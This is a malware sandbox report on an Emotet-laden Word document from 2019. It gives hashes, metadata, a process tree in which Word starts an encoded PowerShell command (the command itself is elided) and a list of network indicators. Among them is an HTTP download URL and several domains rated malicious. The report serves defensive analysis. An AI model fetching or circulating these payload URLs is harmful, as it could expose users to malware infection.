Field | Value
---|---
File name | Dane_018218349_17693052648.doc
Full analysis | https://app.any.run/tasks/8dc770f5-dcf1-4b5e-a619-b78e13fe2dc1
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns.
Analysis date | October 14, 2019, 19:22:15
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Johnpaul Altenwerth, Template: Normal.dotm, Last Saved By: Jayden Hoeger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 26 10:19:00 2019, Last Saved Time/Date: Thu Sep 26 10:19:00 2019, Number of Pages: 1, Number of Words: 86, Number of Characters: 492, Security: 0
MD5 | 7575884DE9A0491014ACDB73A32574BB
SHA1 | 8E49ABB56812A55753A657953F02DDD87509AB23
SHA256 | 825E640864016505F9AF61D726238C843208F030F91D515D04DDCA2EB386EFBD
SSDEEP | 3072:S4XYSrr+wnD0YIjBsV5n21b6RS62Yzs3MFAYxPxTqf7p1UMGQb9YZi:S4XYSrr+wnD0YIjBsV5n21bwSAs3MRPc
Extension | Detected type (confidence)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
Title | -
Subject | -
Author | Johnpaul Altenwerth
Keywords | -
Comments | -
Template | Normal.dotm
LastModifiedBy | Jayden Hoeger
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2019:09:26 09:19:00
ModifyDate | 2019:09:26 09:19:00
Pages | 1
Words | 86
Characters | 492
Security | None
CodePage | Windows Latin 1 (Western European)
Company | -
Lines | 4
Paragraphs | 1
CharCountWithSpaces | 577
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | -
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2132 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dane_018218349_17693052648.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3704 | powershell -enco [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA775.tmp.cvr | — | — | —
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15E4FBD3.wmf | wmf | A8C9CD2EEB2E479304885EA609AC5E10 | 9DE482E540183EA6DE08D3C1B4576FB5D954CB5C99DE0A6AFCAC4740DDCC7051
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\576CE5BD.wmf | wmf | 7EBBA99FD8E30E47CF93C52E511F20B1 | 85316599A19AC6CCBF50DB112C3E53448F46F06871AF9BFBEBA6E29F4676C444
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7DC05D4.wmf | wmf | 9D88D64DF422DA83102EA776DCFEA002 | BC937A021270E56F53B41A6B630A06EEDCE536B16B7368F8BDA2EC5489201EFB
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480F6F1B.wmf | wmf | 3898EA9DC7ABE445E58DDF552A7CEED4 | B1E27AA7F41A6D597F231EA637C799AA438117D734E4E5AC46CB03650FDFB2CA
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D91F72E1.wmf | wmf | 5735E745EB82E87115020986E9869640 | 4B5FA4E3C0F9494B6B74C51412CC7B28123821797C7A4042B6D31FFA563729FC
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9EB7859.wmf | wmf | FFF27C205F166D32013D581E589EA5C6 | 1B635CF2C96D6F58840749C8601DFF66D002A94BB0B9A625559E47B98FBDF406
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB5D1897.wmf | wmf | 1868096D39C561CF4182F1726F02B7DD | B693E6C79617BF16BA6392BA9ACA3AF0BBC8F41079F42BFD272EDF48BF2D9C5A
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E43D4CF.wmf | wmf | 45463D405E55447D217B8A13A4B225A7 | 531D64249C5532AE309124D2AA3A642B9697813B3A5483020D477768A04FF6AD
2132 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8734884.wmf | wmf | 81670EFCBDF065FD0D40D040ADBEB888 | 037E53B4949F0E527A340E98F252A93D954A1C933E86D6362AB3DABE47D94A00
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3704 | powershell.exe | GET | 200 | 104.27.164.253:80 | http://fabiogutierrez.com.br/loja/bEZYtLkJGj/ | US | html | 3.97 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3704 | powershell.exe | 104.27.164.253:80 | fabiogutierrez.com.br | Cloudflare Inc | US | shared |
3704 | powershell.exe | 120.77.84.124:80 | gsfcloud.com | Hangzhou Alibaba Advertising Co.,Ltd. | CN | suspicious |
Domain | IP | Reputation
---|---|---
cheaptrainticket.cogbiz-infotech.com | — | malicious
gsfcloud.com | — | suspicious
fabiogutierrez.com.br | — | suspicious
gruasasuservicio.com | — | unknown
itf.palemiya.com | — | malicious